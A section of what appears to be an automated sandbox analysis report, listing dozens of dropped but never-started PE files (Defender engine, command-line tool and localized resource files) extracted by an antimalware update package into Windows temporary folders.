Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lb-LU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\te-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDlpCmd.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fa-IR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Dropped PE file which has not been started: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
